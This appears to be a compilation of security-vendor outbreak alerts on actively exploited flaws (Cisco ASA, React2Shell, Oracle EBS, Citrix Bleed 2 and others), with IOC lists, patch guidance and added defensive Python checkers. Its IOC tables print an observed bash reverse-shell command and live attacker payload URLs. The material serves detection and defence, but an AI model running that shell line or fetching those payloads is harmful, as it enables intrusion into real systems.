Outbreak Alert!
Cisco ASA and FTD Firewall RCE
Released: Dec 18, 2025
Vendor: Cisco
Type: Attack, Vulnerability
Threat Radar: 4
Severity:
Overview: Espionage Campaign Targeting Perimeter Network Devices.
Critical zero-day vulnerabilities affecting Cisco Secure Firewall Adaptive Security Appliance (ASA) and Cisco Secure Firewall Threat Defense (FTD) software have been actively exploited in the wild. The campaign is widespread and involves exploiting zero-day vulnerabilities to gain unauthenticated remote code execution on ASAs, as well as manipulating read-only memory (ROM) to persist through reboot and system upgrade. This activity presents a significant risk to victim networks.
With high confidence, this activity is attributed to the same threat actor behind ArcaneDoor in 2024.
ArcaneDoor is the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. These devices are coveted by such actors because they are an ideal intrusion point for espionage-focused campaigns. As a critical path for data into and out of the network, they need to be routinely and promptly patched, run up-to-date hardware and software versions and configurations, and be closely monitored from a security perspective. Gaining a foothold on these devices allows an actor to pivot directly into an organisation, reroute or modify traffic, and monitor network communications. In the past two years, there has been a dramatic and sustained increase in the targeting of these devices at telecommunications providers, energy sector organisations, and other critical infrastructure entities that are likely strategic targets of interest for many foreign governments.
Background:
This threat activity has been linked to an advanced threat actor associated with the ArcaneDoor campaign (also tracked as UAT4356 / Storm-1849). Cisco assesses with high confidence that the observed exploitation aligns with ArcaneDoor activity first identified in early 2024.
The associated vulnerabilities were publicly disclosed and patched on September 25, 2025, prompting the Cybersecurity and Infrastructure Security Agency (CISA) to issue Emergency Directive (ED) 25-03, which mandates the immediate identification, remediation, and mitigation of potentially compromised devices across affected environments.
Malware and foothold implants have been observed using these vulnerabilities to:
• Establish remote code execution contexts on perimeter devices.
• Maintain persistence even post-reboot or upgrade on systems lacking proper secure boot technology.
• Potentially pivot deeper into internal networks and exfiltrate data or enable additional post-compromise operations.
This campaign highlights a sustained effort by sophisticated adversaries to weaponize zero-day flaws in widely deployed Cisco security appliances, with the goal of espionage and long-term persistence.
Threat Intelligence
This indicates an attack attempt to exploit a Security Bypass vulnerability in Cisco Adaptive Security Appliance and Firepower Threat Defense. The vulnerability is caused by an improper validation of user supplied data when the vulnerable application handles a maliciously crafted request. Successful exploitation could allow the attacker to bypass security checks on vulnerable systems.
Top targeted countries: (data not included)
Top targeted industries:
- Automotive: 40,518
- Technology: 14,776
- Banking/Finance/Insurance: 7,597
- MSSP: 5,473
- Healthcare: 4,968
Affected Products:
Cisco ASA software release 9.12 – versions prior to 9.12.4.72
Cisco ASA software release 9.14 – versions prior to 9.14.4.28
Cisco ASA software release 9.16 – versions prior to 9.16.4.85
Cisco ASA software release 9.17 – versions prior to 9.17.1.45
Cisco ASA software release 9.18 – versions prior to 9.18.4.67
Cisco ASA software release 9.19 – versions prior to 9.19.1.42
Cisco ASA software release 9.20 – versions prior to 9.20.4.10
Cisco ASA software release 9.22 – versions prior to 9.22.2.14
Cisco ASA software release 9.23 – versions prior to 9.23.1.19
Cisco FTD software release 7.0 – versions prior to 7.0.8.1
Cisco FTD software release 7.1 – all versions
Cisco FTD software release 7.2 – versions prior to 7.2.10.2
Cisco FTD software release 7.3 – all versions
Cisco FTD software release 7.4 – versions prior to 7.4.2.4
Cisco FTD software release 7.6 – versions prior to 7.6.2.1
Cisco FTD software release 7.7 – versions prior to 7.7.10.1
Impact: Security Bypass. Remote attackers can bypass security checks on vulnerable systems.
Indicators of Compromise (IOCs):
There are several known indicators of compromise that defenders can look for when assessing whether their ASA device has been compromised by this attack, as outlined above. For example, any gaps in logging or any recent unexpected reboots should be treated as suspicious activity that warrants further investigation. Below is also a list of IP addresses identified as having been used by UAT4356. Note that some of these IPs are part of publicly known anonymization infrastructure and are not directly controlled by the attackers themselves. If your organisation finds connections to the listed actor IPs and the crash dump functionality has been altered, open a case with Cisco TAC.
Recommendations:
There are some known indicators of compromise that customers can look for if they suspect they have been targeted in this campaign. First, organisations should look for any flows between ASA devices and any of the IP addresses in the IOC list below. Such flows are one indication that further investigation is necessary.
Additionally, organisations can issue the command `show memory region | include lina` to check for another indicator of compromise. If the output shows more than one executable memory region (a region with r-xp permissions), especially if one of those regions is exactly 0x1000 bytes in size, this is a sign of potential tampering.
NOTE: Refer to the vendor’s advisory for updates:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-YROOTUW
Likely Actor-Controlled Infrastructure:
- 192.36.57[.]181
- 185.167.60[.]85
- 185.227.111[.]17
- 176.31.18[.]153
- 172.105.90[.]154
- 185.244.210[.]120
- 45.86.163[.]224
- 172.105.94[.]93
- 213.156.138[.]77
- 89.44.198[.]189
- 45.77.52[.]253
- 103.114.200[.]230
- 212.193.2[.]48
- 51.15.145[.]37
- 89.44.198[.]196
- 131.196.252[.]148
- 213.156.138[.]78
- 121.227.168[.]69
- 213.156.138[.]68
- 194.4.49[.]6
- 185.244.210[.]65
- 216.238.75[.]155
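The two checks in the Recommendations section above (flows to the listed actor IPs, and extra executable regions in `show memory region | include lina` output) can be scripted so they are repeatable across a fleet. The following is an added Python example, not code from the Cisco advisory or this alert. The IP list is the one given above; the maps-style column layout assumed for the `show memory region` output, the sample region lines, and the sample ASA connection-log lines are all constructed for illustration.

```python
"""Triage helpers for the two ASA checks described in the alert:
flows to listed actor infrastructure and extra executable memory regions."""
import re

# Defanged IPs exactly as listed in the alert; refanged on load.
ACTOR_IPS_DEFANGED = [
    "192.36.57[.]181", "185.167.60[.]85", "185.227.111[.]17", "176.31.18[.]153",
    "172.105.90[.]154", "185.244.210[.]120", "45.86.163[.]224", "172.105.94[.]93",
    "213.156.138[.]77", "89.44.198[.]189", "45.77.52[.]253", "103.114.200[.]230",
    "212.193.2[.]48", "51.15.145[.]37", "89.44.198[.]196", "131.196.252[.]148",
    "213.156.138[.]78", "121.227.168[.]69", "213.156.138[.]68", "194.4.49[.]6",
    "185.244.210[.]65", "216.238.75[.]155",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4', 'hxxp://') back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


ACTOR_IPS = frozenset(refang(ip) for ip in ACTOR_IPS_DEFANGED)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def flows_to_actor_infra(log_lines):
    """Return (line_number, matched_ips) for every log line mentioning a listed IP."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        found = sorted(set(IPV4_RE.findall(line)) & ACTOR_IPS)
        if found:
            hits.append((n, found))
    return hits


# Assumed layout for 'show memory region | include lina': a /proc/<pid>/maps-style
# line, "start-end perms offset dev inode path". Only the first two fields are used.
REGION_RE = re.compile(r"^\s*([0-9a-fA-F]+)-([0-9a-fA-F]+)\s+(\S{4})")


def executable_regions(show_memory_output: str):
    """Parse every r-xp region into (start, end, size_in_bytes)."""
    regions = []
    for line in show_memory_output.splitlines():
        m = REGION_RE.match(line)
        if m and m.group(3) == "r-xp":
            start, end = int(m.group(1), 16), int(m.group(2), 16)
            regions.append((start, end, end - start))
    return regions


def memory_region_verdict(show_memory_output: str):
    """Apply the alert's rule: more than one executable region is suspicious,
    and an executable region of exactly 0x1000 bytes is a strong tampering sign."""
    regions = executable_regions(show_memory_output)
    page_sized = [r for r in regions if r[2] == 0x1000]
    return {
        "exec_regions": len(regions),
        "page_sized_exec_regions": len(page_sized),
        "suspicious": len(regions) > 1 or bool(page_sized),
    }


# Constructed samples (not captured from a real device).
CLEAN_OUTPUT = """\
00400000-0a82f000 r-xp 00000000 00:0e 2405 /asa/bin/lina
0aa2f000-0ab17000 rw-p 0a42f000 00:0e 2405 /asa/bin/lina
"""
# Same as above plus one extra executable region of exactly 0x1000 bytes.
TAMPERED_OUTPUT = CLEAN_OUTPUT + "7f3c1c000000-7f3c1c001000 r-xp 00000000 00:0e 2405 /asa/bin/lina\n"

SAMPLE_FLOWS = [
    "%ASA-6-302013: Built outbound TCP connection 1181 for outside:203.0.113.9/443 to inside:10.0.0.5/50112",
    "%ASA-6-302013: Built outbound TCP connection 1182 for outside:192.36.57.181/443 to inside:10.0.0.5/50113",
]

if __name__ == "__main__":
    print(memory_region_verdict(CLEAN_OUTPUT))
    print(memory_region_verdict(TAMPERED_OUTPUT))
    print(flows_to_actor_infra(SAMPLE_FLOWS))
```

The region parser deliberately keys only on the address range and the permission field, so it tolerates differences in the trailing columns; anything it cannot parse is ignored rather than counted, so a real device's output should be eyeballed once to confirm the assumed layout before relying on the verdict.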
Outbreak Alert!
React2Shell Remote Code Execution
Released: Dec 05, 2025
Vendor: React2Shell
Type: Vulnerability
Threat Radar: 3.8
Severity:
Overview:
Critical Unauthenticated RCE in React Server Components Actively Exploited in the Wild.
Background:
Due to the widespread use of React and Next.js in production environments, organizations are strongly urged to apply patches immediately, enforce WAF protections on RSC/Flight endpoints, and conduct proactive threat hunting. CISA has added CVE-2025-55182 to the Known Exploited Vulnerabilities (KEV) catalog following confirmed evidence of active exploitation. AWS Security has also reported exploitation activity originating from infrastructure historically linked to China state-nexus threat actors.
This vulnerability was disclosed as CVE-2025-55182 and is rated CVSS 10.0.
The vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0 of:
- react-server-dom-webpack
- react-server-dom-parcel
- react-server-dom-turbopack
Successful exploitation can lead to:
– Full server compromise, including deployment of persistent backdoors
– Credential harvesting and access to sensitive application data
– Execution of arbitrary Node.js commands on the affected server
– Lateral movement across connected systems and cloud environments.
NOTE: Even if your app does not implement any React Server Function endpoints it may still be vulnerable if your app supports React Server Components.
Threat Intelligence
Additional Resources:
- React Blog: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- Google Cloud Guidance: https://cloud.google.com/blog/products/identity-security/responding-to-cve-2025-55182
- Next.js Advisory: https://nextjs.org/blog/CVE-2025-66478
- AWS Security Blog: https://aws.amazon.com/blogs/security/china-nexus-cyber-threat-groups-rapidly-exploit-react2shell-vulnerability-cve-2025-55182/
Organisations should review the vendor advisories for complete version details, mitigation steps, and updated guidance.
Indicators of Compromise (IOCs):
| Indicator | Type | Status |
|---|---|---|
| http://46.36.37.85:12000/sex.sh | url | Active |
| http://141.11.240.103:45178/test.sh | url | Active |
| http://162.215.170.26:3000/sex.sh | url | Active |
| http://vps-zap812595-1.zap-srv.com:3000/ | url | Active |
| http://vps-zap812595-1.zap-srv.com:3000/sex.sh | url | Active |
Top targeted industries:
- Banking/Finance/Insurance: 4
- Technology: 2
- MSSP: 1
- Media/Communications: 1
Top targeted countries: (data not included)
Immediate Action Required
A fix was introduced in versions 19.0.1, 19.1.2, and 19.2.1. If you are using any of the above packages please upgrade to any of the fixed versions immediately.
If your app’s React code does not use a server, your app is not affected by this vulnerability. If your app does not use a framework, bundler, or bundler plugin that supports React Server Components, your app is not affected by this vulnerability.
The following React frameworks and bundlers are affected: next, react-router, waku, @parcel/rsc, @vitejs/plugin-rsc, and rwsdk. See the React blog post listed under Additional Resources for updated instructions.
All users should upgrade to the latest patched version in their release line.
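Because the vulnerable packages are usually pulled in transitively by a framework rather than listed in package.json directly, the quickest way to answer "are we on a fixed version?" is to walk the lockfile. The following is an added Python example, not code from the React team or from this alert: it scans an npm package-lock.json (lockfileVersion 2 or 3, whose `packages` map keys every installed copy by its node_modules path) for the three packages and vulnerable versions named above. The sample lockfile is constructed, and the alert's "19.0" is assumed to mean the 19.0.0 release.

```python
"""Scan an npm package-lock.json (lockfileVersion 2 or 3) for the React Server
Components packages and versions named in the alert, nested copies included."""
import json

AFFECTED_PACKAGES = {
    "react-server-dom-webpack",
    "react-server-dom-parcel",
    "react-server-dom-turbopack",
}
# Versions the alert lists as vulnerable; "19.0" is assumed to mean the 19.0.0 release.
VULNERABLE_VERSIONS = {"19.0.0", "19.1.0", "19.1.1", "19.2.0"}
# First fixed release in each line, per the alert.
FIXED_VERSIONS = {"19.0.1", "19.1.2", "19.2.1"}


def is_vulnerable(name: str, version: str) -> bool:
    return name in AFFECTED_PACKAGES and version in VULNERABLE_VERSIONS


def package_name(lock_path: str) -> str:
    """'node_modules/next/node_modules/react-server-dom-webpack' -> 'react-server-dom-webpack'.
    Scoped names ('@scope/pkg') survive because only the last 'node_modules/' is split off."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def scan_lockfile(lock: dict):
    """Return [(lock_path, version)] for every installed copy that is vulnerable.
    Nested copies (e.g. one hoisted and one under a framework) are reported separately."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        if not path:  # "" is the root project entry, not a dependency
            continue
        if is_vulnerable(package_name(path), meta.get("version", "")):
            findings.append((path, meta["version"]))
    return findings


def scan_lockfile_file(filename: str):
    """Convenience wrapper: load package-lock.json from disk and scan it."""
    with open(filename, encoding="utf-8") as fh:
        return scan_lockfile(json.load(fh))


# Constructed lockfile fragment: one hoisted vulnerable copy, one nested fixed copy,
# one vulnerable copy of a second package, and an unrelated 'react' entry.
SAMPLE_LOCK = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/react": {"version": "19.2.0"},
        "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
        "node_modules/next/node_modules/react-server-dom-turbopack": {"version": "19.2.1"},
        "node_modules/react-server-dom-parcel": {"version": "19.1.1"},
    },
}

if __name__ == "__main__":
    for path, version in scan_lockfile(SAMPLE_LOCK):
        print(f"VULNERABLE {package_name(path)}@{version} at {path}")
```

Run it against every lockfile in a monorepo, and treat any hit as actionable even when the application does not call Server Functions itself, since the alert notes that supporting React Server Components at all is enough to be exposed.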
Outbreak Alert!
UNC1549 Critical Infrastructure Espionage Attack
Released: Dec 02, 2025
Vendor: UNC1549
Type: Attack, Malware
Threat Radar: 4.6
Severity:
Overview:
Targeted espionage against high-value aerospace/defense and telecom organisations with long-term persistence and custom tooling.
Background:
In past campaigns, the threat actor has leveraged CVE-2021-26855 and CVE-2020-0688 to gain initial access and facilitate follow-on exploitation.
Since mid-2024, UNC1549 has been executing highly targeted espionage campaigns against organisations in the aerospace, aviation, and defense sectors. The group gains initial access through tailored spear-phishing aimed at credential theft and malware delivery, as well as by compromising trusted third-party access and supply-chain relationships to pivot into downstream environments. UNC1549 employs multiple custom malware families and covert operational techniques to establish persistence and evade detection:
– MINIBIKE: Modular backdoor enabling credential theft, keylogging, screenshot capture, and deployment of additional payloads.
– TWOSTROKE: Remote access tool designed for persistence and full host control.
– DEEPROOT: Linux-focused variant providing similar capabilities across non-Windows platforms.
– LIGHTRAIL & GHOSTLINE: Covert C2 and tunneling tools that disguise malicious traffic within legitimate cloud services to support resilient communications and data exfiltration.
These operations are consistent with state-sponsored intelligence requirements, emphasizing the theft of sensitive technical data, monitoring of high-value communications, and maintaining long-term strategic footholds inside targeted environments.
Threat Intelligence
1. Intrusion Prevention
MS.Exchange.Validation.Key.ViewState.Remote.Code.Execution
Description
This indicates an attack attempt to exploit a Remote Code Execution Vulnerability in Microsoft Exchange Server.
The vulnerability is due to insecure keys. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application, via a crafted HTTP request.
Affected Products:
Microsoft Exchange Server 2013 Cumulative Update 23
Microsoft Exchange Server 2019 Cumulative Update 3
Microsoft Exchange Server 2016 Cumulative Update 14
Microsoft Exchange Server 2016 Cumulative Update 15
Microsoft Exchange Server 2019 Cumulative Update 4
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30
Impact:
System Compromise: Remote attackers can gain control of vulnerable systems.
Recommended Actions:
Apply the most recent upgrade or patch from the vendor.
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
2. Virus
W32/UNC_1549.A!tr
Analysis:
W32/UNC_1549.A!tr is classified as a trojan.
A trojan is a type of malware that performs activities without the user’s knowledge. These activities commonly include establishing remote access connections, capturing keyboard input, collecting system information, downloading/uploading files, dropping other malware into the infected system, performing denial-of-service (DoS) attacks, and running/terminating processes.
Recommended Action
Make sure that your FortiGate/FortiClient system is using the latest AV database.
Quarantine/delete files that are detected and replace infected files with clean backup copies.
MITRE ATT&CK Matrix:
(a) Initial Access: T1190 - Exploit Public-Facing Application
(b) Lateral Movement: T1210 - Exploitation of Remote Services
Top Targeted Industries:
- Technology: 51,869
- Banking/Finance/Insurance: 38,013
- Media/Communications: 12,471
- Government: 11,746
Outbreak Alert
Oracle E-Business Suite RCE Zero-day
Released: Oct 08, 2025
Vendor: Oracle
Type: Attack, Ransomware
Threat Radar: 4.6
Severity:
Overview:
Data theft and extortion campaigns. This vulnerability has been actively exploited as a zero-day in data theft and extortion campaigns, with activity linked to the Cl0p ransomware group. Successful exploitation enables complete takeover of Oracle Concurrent Processing, opening the door to lateral movement, sensitive data exfiltration, and potential ransomware deployment.
Background:
CVE-2025-61882 is a critical (CVSS 9.8) unauthenticated remote code execution vulnerability in the BI Publisher integration of Oracle E-Business Suite’s Concurrent Processing component. The flaw is remotely exploitable over HTTP without authentication, allowing attackers to execute arbitrary code and fully compromise affected systems.
Cl0p is the actor behind prior mass exploitation, data theft, and extortion campaigns impacting customers of MOVEit and other managed file transfer solutions.
Threat Intelligence
Indicators of Compromise (IOCs):
The following indicators of compromise represent observed activity (not limited to CVE-2025-61882) and are provided to accelerate detection, threat hunting, and containment.
| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |

| Indicator | Type | Status |
|---|---|---|
| 104.194.11.200 | ip | Active |
| 104.194.11.200:443 | ip | Active |
| 161.97.99.49 | ip | Active |
| 162.55.17.215 | ip | Active |
| 162.55.17.215:443 | ip | Active |
What customers should do:
Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible. Oracle always recommends that customers remain on actively-supported versions and apply all Security Alerts and Critical Patch Update security patches without delay. Note that the October 2023 Critical Patch Update is a prerequisite for application of the updates in this Security Alert.
Indicators of compromise (IP addresses, observed commands, and files) to support immediate detection, hunting, and containment are detailed above.
Outbreak Alert
ShadowSilk Data Exfiltration Attack
Released: Sep 12, 2025
Vendor: Drupal, WordPress
Threat Radar: 4.4
Type: Attack
Severity:
Common Vulnerabilities and Exposures:
CVE-2018-7600
CVE-2018-7602
CVE-2024-27956
Background:
ShadowSilk is an advanced persistent threat (APT) group active since at least 2023. The group has targeted nearly three dozen organizations across Central Asia and the Asia-Pacific region, with a particular focus on government entities.
Investigations by Group-IB confirmed numerous victims within the Central Asian government sector. ShadowSilk operations are characterized by the use of publicly available exploits, penetration-testing frameworks, and infrastructure sourced from the dark web to facilitate large-scale data exfiltration campaigns.
Threat Intelligence
IOC Indicator List
| Indicator | Type | Status |
|---|---|---|
| 202.28.229.174 | ip | Active |
| 3.112.222.230 | ip | Active |
| 8e83c42ffd3c5a88b2b2853ff931164ebce1c0f3 | file | Active |
| b0ca85463fe805ffdf809206771719dc571eb052 | file | Active |
| http://202.28.229.174/ap.sh | url | Active |
Solution and Mitigation steps:
CVE-2018-7600 and CVE-2018-7602:
Upgrade to the most recent version of Drupal 7 or 8 core.
If you are running 7.x, upgrade to Drupal 7.58. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
If you are running 8.5.x, upgrade to Drupal 8.5.1. (If you are unable to update immediately, you can attempt to apply this patch to fix the vulnerability until such time as you are able to completely update.)
CVE-2024-27956:
In response to this threat, website owners are urged to take immediate action to protect their WordPress sites. Key mitigation steps include:
Plugin Updates: Ensure that the WP‑Automatic plugin is updated to the latest version.
User Account Review: Regularly review and audit user accounts within WordPress, removing any unauthorized or suspicious admin users.
Security Monitoring: Employ robust security monitoring tools and services like Jetpack Scan to detect and respond to malicious activity on your website. Also, if you are using Jetpack Scan and you’re looking to bolster your website’s security, consider enabling Enhance Protection. By activating this feature, you empower the Web Application Firewall (WAF) to inspect requests directed at standalone PHP files that might be vulnerable. This means that even if attackers attempt to send requests directly to PHP files, our WAF will be there to inspect and safeguard your website against potential threats.
Backup and Restore: Maintain up‑to‑date backups of your website data to facilitate swift restoration in the event of a compromise.
For Jetpack WAF users with old versions of the wp-automatic plugin, we created a rule that effectively blocks access to the vulnerable PHP file, ensuring that all malicious requests are rejected. We also added new rules in our malware database to detect and clean the malware used in this campaign.
Outbreak Alert
Citrix Bleed 2
Released: Aug 06, 2025
Vendor: Citrix
Type: Vulnerability
Threat Radar: 3.6
Severity:
Common Vulnerabilities and Exposures:
- CVE-2025-5777
- CVE-2025-5349
- CVE-2025-6543
Background:
The vulnerability is named after the infamous Citrix Bleed attack (CVE-2023-4966), reported around October 2023 and widely exploited by multiple threat actors, including ransomware groups. The original flaw also affected Citrix NetScaler ADC and Gateway appliances.
CVE-2025-5777 is a critical buffer over-read vulnerability, dubbed 'Citrix Bleed 2', affecting Citrix NetScaler ADC and NetScaler Gateway. The flaw stems from insufficient input validation, enabling an unauthenticated remote attacker to retrieve portions of the server's memory. Exploiting this issue could allow attackers to read sensitive data directly from memory, potentially exposing credentials, session tokens, or other confidential information.
CVE-2025-6543 is a memory overflow vulnerability leading to unintended control flow and denial of service in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. Citrix reports that exploitation of CVE-2025-6543 against unmitigated appliances has been observed.
CVE-2025-5349 is an improper access control vulnerability on the NetScaler Management Interface.
Details
NetScaler ADC and NetScaler Gateway contain the vulnerabilities mentioned below:
| CVE ID | Description | Pre-conditions | CWE | CVSSv4 |
|---|---|---|---|---|
| CVE-2025-5349 | Improper access control on the NetScaler Management Interface | Access to NSIP, Cluster Management IP or local GSLB Site IP | CWE-284: Improper Access Control | CVSS v4.0 Base Score: 8.7 (CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L) |
| CVE-2025-5777 | Insufficient input validation leading to memory overread | NetScaler must be configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) OR AAA virtual server | CWE-125: Out-of-bounds Read | CVSS v4.0 Base Score: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L) |
What Customers Should Do
Cloud Software Group strongly urges affected customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions as soon as possible.
- NetScaler ADC and NetScaler Gateway 14.1-43.56 and later releases
- NetScaler ADC and NetScaler Gateway 13.1-58.32 and later releases of 13.1
- NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.235 and later releases of 13.1-FIPS and 13.1-NDcPP
- NetScaler ADC 12.1-FIPS 12.1-55.328 and later releases of 12.1-FIPS
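NetScaler builds are versioned as release line plus build number (for example 13.1-58.32), and the fixed threshold differs per line and per FIPS/NDcPP variant, so a naive string comparison gets builds like 58.100 versus 58.32 wrong. The following is an added Python example, not code from Citrix or this alert: it parses a build string or a `show version` line and compares it numerically against the fixed builds listed above. The layout assumed for the `show version` line ("NetScaler NS13.1: Build 58.32.nc, ...") and the sample inputs are assumptions; the thresholds are the ones given in this alert.

```python
"""Check whether a NetScaler ADC/Gateway build meets the fixed-version thresholds
listed in the alert, comparing build numbers numerically rather than as strings."""
import re

# (release line, variant) -> first fixed build (major, minor), as listed in the alert.
FIXED_BUILDS = {
    ("14.1", ""): (43, 56),
    ("13.1", ""): (58, 32),
    ("13.1", "FIPS"): (37, 235),
    ("13.1", "NDcPP"): (37, 235),
    ("12.1", "FIPS"): (55, 328),
}

# "13.1-58.32" form used in the advisory text.
VERSION_RE = re.compile(r"^(\d+\.\d+)-(\d+)\.(\d+)$")
# Assumed 'show version' layout: "NetScaler NS13.1: Build 58.32.nc, Date: ..."
SHOW_VERSION_RE = re.compile(r"NS(\d+\.\d+):\s+Build\s+(\d+)\.(\d+)")


def parse_version(text: str):
    """Return (release_line, (build_major, build_minor)) from either input form."""
    m = VERSION_RE.match(text.strip()) or SHOW_VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised NetScaler version: {text!r}")
    return m.group(1), (int(m.group(2)), int(m.group(3)))


def patch_status(text: str, variant: str = "") -> str:
    """'patched', 'vulnerable', or a note when the alert lists no fix for that line.
    variant is '' for standard builds, 'FIPS' or 'NDcPP' for those editions."""
    line, build = parse_version(text)
    fixed = FIXED_BUILDS.get((line, variant))
    if fixed is None:
        return "no fixed build listed for this line"
    # Tuple comparison is numeric per component, so 58.100 correctly exceeds 58.32.
    return "patched" if build >= fixed else "vulnerable"


def triage(inventory):
    """Apply patch_status to an inventory of (hostname, version_text, variant) tuples."""
    return [(host, patch_status(version, variant)) for host, version, variant in inventory]


# Constructed inventory, not real hosts.
SAMPLE_INVENTORY = [
    ("gw-01", "14.1-43.56", ""),
    ("gw-02", "13.1-58.9", ""),
    ("gw-03", "NetScaler NS13.1: Build 58.100.nc, Date: Jan 1 2026", ""),
    ("gw-fips", "13.1-37.235", "FIPS"),
    ("gw-old", "12.1-55.328", ""),
]

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY):
        print(f"{host}: {status}")
```

Pass the variant explicitly rather than guessing it from the build number: a 13.1-37.235 build is fully patched as FIPS/NDcPP but far below the 58.32 threshold for the standard 13.1 line, and the check would otherwise misreport it.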
